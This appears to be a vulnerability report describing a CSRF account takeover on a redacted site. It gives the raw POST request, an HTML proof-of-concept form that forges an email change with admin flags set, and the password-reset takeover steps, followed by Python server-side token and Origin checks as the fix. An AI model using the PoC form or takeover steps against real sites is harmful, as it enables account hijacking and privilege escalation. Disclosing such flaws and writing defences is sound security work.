Takeover Victims Account Via CSRF
URL:
Description:
I just found out that we can take over any account simply by getting the target user to visit a link. Yes, just a link. We can change any account information, including the password, through a CSRF attack: the request carries no anti-CSRF token, so nothing prevents it from being forged from another site.
Request:
POST /user/save?context=1 HTTP/1.1
Host: abc.private.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 612
Connection: close
Cookie: [cookie]
safestrings=true&name=admin&email=email%40gmail.com&admin=true&admin_u=true&limited_access=false&job=&full_name=a
CSRF POC:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://private.com/user/save?context=1" method="POST">
<input type="hidden" name="safestrings" value="true" />
<input type="hidden" name="name" value="admin" />
<input type="hidden" name="email" value="email@gmail.com" />
<input type="hidden" name="admin" value="true" />
<input type="hidden" name="admin_u" value="true" />
<input type="hidden" name="limited_access" value="false" />
<input type="hidden" name="job" value="" />
<input type="hidden" name="full_name" value="a" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Account Takeover Scenario:
- We send the CSRF page to the user; when it executes, it updates the account info and changes the email address.
- After execution, the victim's email address has been changed.
- Finally, we request a password reset, which is delivered to the attacker's own email address that the CSRF set on the victim's account.
- Account compromised.
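The fix on the server side is to reject state-changing requests that do not carry a per-session anti-CSRF token and a trusted Origin. The following is an added example of such a check (not code from the original report or the affected site); the trusted origin, session id and secret are constructed values, and the form field name csrf_token is an assumption.

```python
import hmac
import hashlib
from urllib.parse import urlparse, parse_qs

# Constructed values for illustration; the real site would use its own.
TRUSTED_ORIGIN = "https://abc.private.com"
SESSION_ID = "sess-123"
SECRET = b"constructed-server-secret"

# The exact body from the report's request: note there is no csrf_token field.
REPORT_BODY = ("safestrings=true&name=admin&email=email%40gmail.com&admin=true"
               "&admin_u=true&limited_access=false&job=&full_name=a")


def issue_csrf_token(session_id: str, secret: bytes) -> str:
    """Derive a per-session anti-CSRF token (synchronizer-token style) to embed in the form."""
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def is_request_allowed(headers: dict, body: str, session_id: str, secret: bytes) -> bool:
    """Allow /user/save only if Origin (or Referer) is ours AND the body carries a valid token."""
    # 1. Origin check: a form auto-submitted from another site carries that site's origin.
    origin = headers.get("Origin") or headers.get("Referer")
    if not origin:
        return False
    parsed = urlparse(origin)
    if f"{parsed.scheme}://{parsed.netloc}" != TRUSTED_ORIGIN:
        return False
    # 2. Token check: the forged request cannot know the victim's session-bound token.
    fields = parse_qs(body, keep_blank_values=True)
    submitted = fields.get("csrf_token", [""])[0]
    expected = issue_csrf_token(session_id, secret)
    return hmac.compare_digest(submitted, expected)


def demo() -> dict:
    """Evaluate the report's forged request and a legitimate same-origin submission."""
    token = issue_csrf_token(SESSION_ID, SECRET)
    return {
        "forged_no_token": is_request_allowed(
            {"Origin": "https://attacker.invalid"}, REPORT_BODY, SESSION_ID, SECRET),
        "same_origin_no_token": is_request_allowed(
            {"Origin": TRUSTED_ORIGIN}, REPORT_BODY, SESSION_ID, SECRET),
        "legitimate": is_request_allowed(
            {"Origin": TRUSTED_ORIGIN}, REPORT_BODY + "&csrf_token=" + token, SESSION_ID, SECRET),
    }
```

Pairing this check with a SameSite=Lax or Strict session cookie removes the remaining browser-side vector.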